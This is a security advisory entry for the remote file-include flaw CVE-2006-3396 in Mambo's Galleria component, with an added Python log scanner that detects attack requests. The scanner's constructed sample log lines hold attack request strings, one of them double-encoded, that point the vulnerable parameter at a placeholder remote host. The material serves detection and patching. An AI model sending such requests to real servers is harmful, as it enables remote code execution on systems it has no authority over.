Intrusion Prevention

Mambo.Galleria.galleria.html.php.File.Inclusion

Description

Galleria has a remote file-include vulnerability. A remote attacker could execute an arbitrary script on the web server with the privileges of the server, via a specially-crafted URL request to the galleria.html.php script, by using the 'mosConfig_absolute_path' parameter to specify a malicious PHP file from a remote system.
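The request pattern described above can be looked for in web server access logs. The following is an added example, not part of the original advisory or of any vendor signature; it assumes common/combined log format, and the sample lines, addresses, directory path and host name are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

SCRIPT = "galleria.html.php"          # script named in the advisory
PARAM = "mosconfig_absolute_path"     # parameter named in the advisory (compared lowercased)
# A value that points off-host: scheme://, protocol-relative //, or a UNC path.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*://|//|\\\\)", re.I)
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def is_rfi_attempt(target):
    """True if the request target hits the script with a remote include path."""
    parts = urlsplit(target)
    if not unquote(parts.path).lower().endswith("/" + SCRIPT):
        return False
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() != PARAM:
            continue
        # parse_qsl decodes once; decode again to catch double-encoded values.
        if REMOTE.match(value) or REMOTE.match(unquote(value)):
            return True
    return False

def scan(lines):
    """Return (client, target) pairs for log lines matching the pattern."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if m and is_rfi_attempt(m.group(2)):
            hits.append((m.group(1), m.group(2)))
    return hits

# Constructed sample log lines (documentation addresses, placeholder host).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jul/2006:10:00:00 +0000] "GET /site/galleria.html.php'
    '?mosConfig_absolute_path=http://example.invalid/x.txt? HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jul/2006:10:00:05 +0000] "GET /index.php'
    '?option=com_galleria HTTP/1.1" 200 8042',
    '192.0.2.12 - - [01/Jul/2006:10:00:09 +0000] "GET /site/galleria.html.php'
    '?mosConfig_absolute_path=http%253A%252F%252Fexample.invalid%252Fx.txt HTTP/1.1" 200 512',
    '192.0.2.13 - - [01/Jul/2006:10:00:12 +0000] "GET /site/galleria.html.php HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for client, target in scan(SAMPLE_LOG):
        print(f"possible remote file include from {client}: {target}")
```

A hit shows that the request was made, not that the include succeeded; a 200 response to such a request on an unpatched Galleria 1.0 or earlier install warrants checking the host.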

Affected Products

Galleria version 1.0 and prior.

Impact

Gain Access

Recommended Actions

Apply the patch:
http://forum.mamboserver.com/showthread.php?t=83001

CVE References

CVE-2006-3396